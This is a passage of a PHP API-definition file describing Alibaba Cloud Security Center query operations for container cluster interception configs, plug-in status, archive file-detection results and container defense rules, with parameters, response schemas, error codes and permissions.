'49FDE92F-A0B8-56CC-B7A8-23B17646****', 'title' => ''], 'ClusterConfigList' => [ 'description' => 'The list of cluster configuration information.', 'type' => 'array', 'items' => [ 'description' => 'The cluster configuration information.', 'type' => 'object', 'properties' => [ 'ClusterName' => ['description' => 'The cluster name.', 'type' => 'string', 'example' => 'container-opa-kill-02', 'title' => ''], 'InterceptionSwitch' => ['description' => 'The status of the rule interception switch. Valid values:'."\n" .'- **0**: disabled'."\n" .'- **1**: enabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ClusterId' => ['description' => 'The cluster ID.', 'type' => 'string', 'example' => 'c9051d30d8a044b4d99e1cb5d25ac****', 'title' => ''], 'ClusterCNNFStatus' => ['description' => 'The container firewall status of the cluster. Valid values:'."\n" .'- **-1**: unknown'."\n" .'- **0**: abnormal'."\n" .'- **1**: normal'."\n" .'- **2**: normal pending confirmation.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'OpenRuleCount' => ['description' => 'The number of active rules.', 'type' => 'integer', 'format' => 'int64', 'example' => '12', 'title' => ''], 'TotalRuleCount' => ['description' => 'The total number of rules.', 'type' => 'integer', 'format' => 'int64', 'example' => '123', 'title' => ''], 'SupportCNNF' => ['description' => 'Indicates whether the container firewall is supported.', 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'ClusterType' => ['description' => 'The cluster type. Valid values:'."\n" ."\n" .'- **ManagedKubernetes**: managed Kubernetes'."\n" .'- **NotManagedKubernetes**: non-managed Kubernetes'."\n" .'- **PrivateKubernetes**: private cluster'."\n" .'- **kubernetes**: dedicated Kubernetes'."\n" .'- **ask**: dedicated ASK.', 'type' => 'string', 'example' => 'ManagedKubernetes', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The paging information for a paged query.', 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of cluster interception rules.', 'type' => 'integer', 'format' => 'int32', 'example' => '11', 'title' => ''], 'Count' => ['description' => 'The number of cluster interception rules on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '11', 'title' => ''], 'CurrrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of cluster interception rules per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query cluster interception rules', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListClusterInterceptionConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListClusterInterceptionConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"49FDE92F-A0B8-56CC-B7A8-23B17646****\\",\\n \\"ClusterConfigList\\": [\\n {\\n \\"ClusterName\\": \\"container-opa-kill-02\\",\\n \\"InterceptionSwitch\\": 1,\\n \\"ClusterId\\": \\"c9051d30d8a044b4d99e1cb5d25ac****\\",\\n \\"ClusterCNNFStatus\\": 0,\\n \\"OpenRuleCount\\": 12,\\n \\"TotalRuleCount\\": 123,\\n \\"SupportCNNF\\": false,\\n \\"ClusterType\\": \\"ManagedKubernetes\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"TotalCount\\": 11,\\n \\"Count\\": 11,\\n \\"CurrrentPage\\": 1,\\n \\"PageSize\\": 20\\n }\\n}","type":"json"}]', ], 'ListClusterPluginInfo' => [ 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'PluginName', 'in' => 'query', 'schema' => ['description' => 'The name of the plug-in.'."\n", 'type' => 'string', 'required' => false, 'example' => 'alihips', 'title' => ''], ], [ 'name' => 'ClusterIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of the clusters.'."\n", 'type' => 'array', 'items' => ['description' => 'The ID of the cluster.'."\n", 'type' => 'string', 'required' => false, 'example' => '902e428f6cc6679685d65fc81803****', 'title' => ''], 'required' => true, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '0B48AB3C-84FC-424D-A01D-B9270EF46038', 'title' => ''], 'Data' => [ 'description' => 'The information about the plug-in.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'ClusterStatus' => ['description' => 'The status of the cluster. Valid values:'."\n" ."\n" .'* 1: normal'."\n" .'* 2: abnormal'."\n" .'* 3: offline'."\n", 'type' => 'string', 'example' => 'ABNORMAL', 'title' => ''], 'ClusterId' => ['description' => 'The ID of the cluster.'."\n", 'type' => 'string', 'example' => 'c8ca91e0907d94efaba7fb0827eb9****', 'title' => ''], 'ClusterName' => ['description' => 'The name of the cluster.'."\n", 'type' => 'string', 'example' => 'lmftest', 'title' => ''], 'NodePluginInfoList' => [ 'description' => 'The plug-ins.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'PluginVersion' => ['description' => 'The version of the plug-in.'."\n", 'type' => 'string', 'example' => '1.3.1', 'title' => ''], 'Installed' => ['description' => 'Indicates whether the plug-in is installed. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'MachineType' => ['description' => 'The type of the instance. Valid values include:'."\n" ."\n" .'* **ecs**: Elastic Compute Service (ECS) instance'."\n" .'* **slb**: Server Load Balancer (SLB) instance'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => 'ECS', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'example' => 'bc563d2b-2a3d-411b-8bbe-d75b8d3c****', 'title' => ''], 'MachineIntranetIp' => ['description' => 'The private IP address of the server.'."\n", 'type' => 'string', 'example' => '10.XXX.XXX.XX', 'title' => ''], 'Online' => ['description' => 'Indicates whether the Security Center agent is online. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n" ."\n" .'> If the Security Center agent of the server is offline, Security Center does not protect the server.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'MachineInternetIp' => ['description' => 'The public IP address of the server.'."\n", 'type' => 'string', 'example' => '100.100.XXX.XX', 'title' => ''], 'PluginName' => ['description' => 'The name of the plug-in.'."\n", 'type' => 'string', 'example' => 'alihips', 'title' => ''], 'MachineName' => ['description' => 'The name of the server.'."\n", 'type' => 'string', 'example' => 'npznas05', 'title' => ''], 'instanceId' => ['description' => 'The instance ID of the server.'."\n", 'type' => 'string', 'example' => 'tpp-cn-2r42njq4y001', 'title' => ''], 'ErrorCode' => ['description' => 'The error code returned.'."\n", 'type' => 'string', 'example' => 'kenerl not support', 'title' => ''], 'ErrorMsg' => ['description' => 'The error message returned.'."\n", 'type' => 'string', 'example' => 'kenerl not support', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ListClusterPluginInfo', 'summary' => 'Queries the status of plug-ins on clusters.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListClusterPluginInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListClusterPluginInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0B48AB3C-84FC-424D-A01D-B9270EF46038\\",\\n \\"Data\\": [\\n {\\n \\"ClusterStatus\\": \\"ABNORMAL\\",\\n \\"ClusterId\\": \\"c8ca91e0907d94efaba7fb0827eb9****\\",\\n \\"ClusterName\\": \\"lmftest\\",\\n \\"NodePluginInfoList\\": [\\n {\\n \\"PluginVersion\\": \\"1.3.1\\",\\n \\"Installed\\": true,\\n \\"MachineType\\": 0,\\n \\"Uuid\\": \\"bc563d2b-2a3d-411b-8bbe-d75b8d3c****\\",\\n \\"MachineIntranetIp\\": \\"10.XXX.XXX.XX\\",\\n \\"Online\\": true,\\n \\"MachineInternetIp\\": \\"100.100.XXX.XX\\",\\n \\"PluginName\\": \\"alihips\\",\\n \\"MachineName\\": \\"npznas05\\",\\n \\"instanceId\\": \\"tpp-cn-2r42njq4y001\\",\\n \\"ErrorCode\\": \\"kenerl not support\\",\\n \\"ErrorMsg\\": \\"kenerl not support\\"\\n }\\n ]\\n }\\n ]\\n}","type":"json"}]', ], 'ListCompressFileDetectResult' => [ 'summary' => 'Retrieves a list of file detection results from an archive.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '215080', 'abilityTreeNodes' => ['FEATUREsasNPORLE'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.', 'type' => 'string', 'required' => false, 'example' => '27.9.XX.XX', 'title' => ''], ], [ 'name' => 'HashKey', 'in' => 'query', 'schema' => ['description' => 'The unique identifier for the file.', 'type' => 'string', 'required' => false, 'example' => '0a212417e65c26ff133cfff28f6c****', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number. Default value: 1.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'minimum' => '1', 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page. Default value: 20.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'maximum' => '100', 'minimum' => '1', 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The unique ID of the request, generated by Alibaba Cloud. Use this ID for troubleshooting.', 'type' => 'string', 'example' => 'E10BAF1C-A6C5-51E2-866C-76D5922E****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The current page number.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '55', 'title' => ''], ], 'title' => '', 'example' => '', ], 'ResultList' => [ 'description' => 'A list of detection results for the files in the archive.', 'type' => 'array', 'items' => [ 'description' => 'The details of a file detection result.', 'type' => 'object', 'properties' => [ 'HashKey' => ['description' => 'The unique identifier for the file.', 'type' => 'string', 'example' => '0a212417e65c26ff133cfff28f6c****', 'title' => ''], 'Result' => ['description' => 'The detection result of the file. Valid values:'."\n" ."\n" .'- **0**: safe file'."\n" ."\n" .'- **1**: suspicious file'."\n" ."\n" .'- **3**: detection in progress', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Score' => ['description' => 'The detection score for the file. The following list describes the score ranges and corresponding risk levels:'."\n" ."\n" .'- 0–60: Safe'."\n" ."\n" .'- 61–70: Risky'."\n" ."\n" .'- 71–80: Suspicious'."\n" ."\n" .'- 81–100: Malicious'."\n" ."\n" .'>'."\n" ."\n" .'A higher score indicates a greater risk.'."\n" ."\n" .'>'."\n" ."\n" .'> This parameter is not returned when `Type` is `6`.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'VirusType' => ['description' => 'The threat type. Valid values:'."\n" ."\n" .'- **Trojan**: trojan'."\n" ."\n" .'- **WebShell**: A website backdoor'."\n" ."\n" .'- **Backdoor**: A generic backdoor'."\n" ."\n" .'- **RansomWare**: ransomware'."\n" ."\n" .'- **Scanner**: scanner'."\n" ."\n" .'- **Stealer**: stealer'."\n" ."\n" .'- **Malbaseware**: Contaminated base software'."\n" ."\n" .'- **Hacktool**: hacktool'."\n" ."\n" .'- **Engtest**: Engine test program'."\n" ."\n" .'- **Downloader**: downloader'."\n" ."\n" .'- **Virus**: virus'."\n" ."\n" .'- **Miner**: miner'."\n" ."\n" .'- **Worm**: worm'."\n" ."\n" .'- **DDoS**: DDoS trojan'."\n" ."\n" .'- **Malware**: malware'."\n" ."\n" .'- **Backdoor**: reverse shell backdoor'."\n" ."\n" .'- **RiskWare**: riskware'."\n" ."\n" .'- **Proxytool**: proxy tool'."\n" ."\n" .'- **Suspicious**: suspicious program'."\n" ."\n" .'- **MalScript**: malicious script'."\n" ."\n" .'- **Rootkit**: rootkit'."\n" ."\n" .'- **Exploit**: exploit'."\n" ."\n" .'> This parameter is not returned when `Result` is `0` or `3`.', 'type' => 'string', 'example' => 'WebShell', 'title' => ''], 'Ext' => ['description' => 'Additional information about the detection result.', 'type' => 'string', 'example' => '{'."\n" .' "HighLight":'."\n" .' ['."\n" .' ['."\n" .' 23245,'."\n" .' 23212'."\n" .' ]'."\n" .' ],'."\n" .' "FileLabel":'."\n" .' ['."\n" .' "PE32",'."\n" .' "Zip",'."\n" .' "SFX",'."\n" .' "encrypted"'."\n" .' ]'."\n" .'}', 'title' => ''], 'Path' => ['description' => 'The file path within the archive.', 'type' => 'string', 'example' => '/root/1.zip/test****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RequestTooFrequently', 'errorMessage' => 'Request too frequently, please try again later', 'description' => ''], ['errorCode' => 'GetResultFail', 'errorMessage' => 'Get result fail, found no detect record for this file or result has been expired', 'description' => ''], ['errorCode' => 'InvalidApiDetectType', 'errorMessage' => 'Unsupported Api Detect Type.', 'description' => 'The file type is not supported.'], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'SystemBusy', 'errorMessage' => 'System busy, please try again later.', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"E10BAF1C-A6C5-51E2-866C-76D5922E****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 55\\n },\\n \\"ResultList\\": [\\n {\\n \\"HashKey\\": \\"0a212417e65c26ff133cfff28f6c****\\",\\n \\"Result\\": 0,\\n \\"Score\\": 100,\\n \\"VirusType\\": \\"WebShell\\",\\n \\"Ext\\": \\"{\\\\n \\\\\\"HighLight\\\\\\":\\\\n [\\\\n [\\\\n 23245,\\\\n 23212\\\\n ]\\\\n ],\\\\n \\\\\\"FileLabel\\\\\\":\\\\n [\\\\n \\\\\\"PE32\\\\\\",\\\\n \\\\\\"Zip\\\\\\",\\\\n \\\\\\"SFX\\\\\\",\\\\n \\\\\\"encrypted\\\\\\"\\\\n ]\\\\n}\\",\\n \\"Path\\": \\"/root/1.zip/test****\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'ListCompressFileDetectResult', 'description' => 'Use this API to retrieve detection results for files within a compressed file that has been submitted for detection. The system retains detection results for 5 hours, during which you can query them multiple times. To submit a file for detection, use the `CreateFileDetect` API. To retrieve the detection result for the compressed file itself, use the `GetFileDetectResult` API.'."\n" ."\n" .'All file detection APIs include the `HashKey` parameter, which is the unique file identifier.'."\n" ."\n" .'For malicious file detection (when `Type` is `0`), you must provide the MD5 or SHA-256 hash of the complete file content. Calculate this value before you call the API.'."\n" ."\n" .'For Skill compressed file detection (when `Type` is `6`), obtain the `HashKey` from the return value of the `CreateFileDetect` API.'."\n" ."\n" .'Note: You must use the same `HashKey` for the submission and query requests for a single detection. Otherwise, you cannot correctly submit the file for detection or retrieve its results.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCompressFileDetectResult'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListCompressFileDetectResult', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListContainerDefenseRule' => [ 'summary' => 'Retrieves the list of defense rules for non-image programs.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'RuleType', 'in' => 'query', 'schema' => ['description' => 'The rule type. Valid values:'."\n" .'- 1: system rule'."\n" .'- 2: user rule.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Conditions', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of conditions.', 'type' => 'array', 'items' => [ 'description' => 'The list of conditions.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The condition type. The following type is supported:'."\n" ."\n" .'- **ruleName**: rule name.', 'type' => 'string', 'required' => false, 'example' => 'ruleName', 'title' => ''], 'Value' => ['description' => 'The condition content.', 'type' => 'string', 'required' => false, 'example' => 'auto-test-rule-**', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page in a paging query. Default value: 20. If you leave this parameter empty, 20 entries are returned per page.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'IsDefaultRule', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the rule is a system default rule.>This parameter is deprecated.>.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PageResult', 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'The list of rules.', 'type' => 'array', 'items' => [ 'description' => 'The rule object.', 'type' => 'object', 'properties' => [ 'RuleId' => ['description' => 'The rule ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '181', 'title' => ''], 'RuleType' => ['description' => 'The rule type. Valid values:'."\n" .'- **1**: system rule.'."\n" .'- **2**: user-defined rule.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RuleName' => ['description' => 'The rule name.', 'type' => 'string', 'example' => 'test-rule-01', 'title' => ''], 'Description' => ['description' => 'The rule description.', 'type' => 'string', 'example' => 'defense rule.', 'title' => ''], 'RuleAction' => ['description' => 'The rule action. Valid values:'."\n" ."\n" .'- **1**: Alert.'."\n" ."\n" .'- **2**: Block.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RuleSwitch' => ['description' => 'The switch status of the rule. Valid values:'."\n" ."\n" .'- **1**: enabled.'."\n" .'- **0**: disabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ClusterCount' => ['description' => 'The total number of clusters.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ClusterIdList' => ['description' => 'The list of clusters associated with the rule.', 'type' => 'string', 'example' => 'cfb41a8**8a106', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information of the query result.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '45', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '9', 'title' => ''], 'LastRowKey' => ['description' => 'The key of the last entry.', 'type' => 'string', 'example' => 'CAESGgo***jE2NDc4NjE=', 'title' => ''], 'NextToken' => ['description' => 'The value of NextToken returned when the NextToken-based pagination method is used.', 'type' => 'string', 'example' => 'B60***', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: successful.'."\n" .'- **false**: failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of a failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '5E3A63BA-***843', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code of the request.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve defense rules for non-image programs', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListContainerDefenseRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListContainerDefenseRule', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'ContainerDefenseRule', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:containerdefenserule/*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"List\\": [\\n {\\n \\"RuleId\\": 181,\\n \\"RuleType\\": 1,\\n \\"RuleName\\": \\"test-rule-01\\",\\n \\"Description\\": \\"defense rule.\\",\\n \\"RuleAction\\": 1,\\n \\"RuleSwitch\\": 0,\\n \\"ClusterCount\\": 1,\\n \\"ClusterIdList\\": \\"cfb41a8**8a106\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 45,\\n \\"Count\\": 9,\\n \\"LastRowKey\\": \\"CAESGgo***jE2NDc4NjE=\\",\\n \\"NextToken\\": \\"B60***\\"\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"5E3A63BA-***843\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'ListContainerDefenseRuleClusters' => [ 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'ListResult', 'type' => 'object', 'properties' => [ 'ClusterList' => [ 'description' => 'The list of clusters.', 'type' => 'array', 'items' => [ 'description' => 'The cluster information.', 'type' => 'object', 'properties' => [ 'ClusterId' => ['description' => 'The cluster ID.', 'type' => 'string', 'example' => 'cfeb7a9f99ce740e98c5595d0fe37****', 'title' => ''], 'RuleId' => ['description' => 'The rule ID.'."\n" .'> You can call the [ListInterceptionRulePage](~~2590599~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'example' => '403178', 'title' => ''], 'AllNamespace' => ['description' => 'Indicates whether all namespaces are included. Valid values:'."\n" ."\n" .'- **0**: No.'."\n" .'- **1**: Yes.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Namespaces' => [ 'description' => 'The list of namespaces.', 'type' => 'array', 'items' => ['description' => 'The namespace ID.', 'type' => 'string', 'example' => 'kube-system', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Count' => ['description' => 'The number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: Successful.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned for the request result.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => '1F995515-CAF3-5F84-8D82-C9F706AD5070', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code of the request result.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve all clusters associated with non-image-based program defense rules', 'summary' => 'Retrieves all clusters associated with non-image-based program defense rules.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListContainerDefenseRuleClusters'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListContainerDefenseRuleClusters', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"ClusterList\\": [\\n {\\n \\"ClusterId\\": \\"cfeb7a9f99ce740e98c5595d0fe37****\\",\\n \\"RuleId\\": 403178,\\n \\"AllNamespace\\": 1,\\n \\"Namespaces\\": [\\n \\"kube-system\\"\\n ]\\n }\\n ],\\n \\"Count\\": 1,\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"1F995515-CAF3-5F84-8D82-C9F706AD5070\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'ListCriteriaStrategy' => [ 'summary' => 'Queries the IDs and names of rules configured for proactive defense for containers.', 'methods' => ['get', 'post'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list'], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The cluster ID.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to query the IDs of clusters.'."\n", 'type' => 'string', 'required' => false, 'example' => 'c4af4fdf38a98496a9b63c2be5dae****'], ], [ 'name' => 'StrategyName', 'in' => 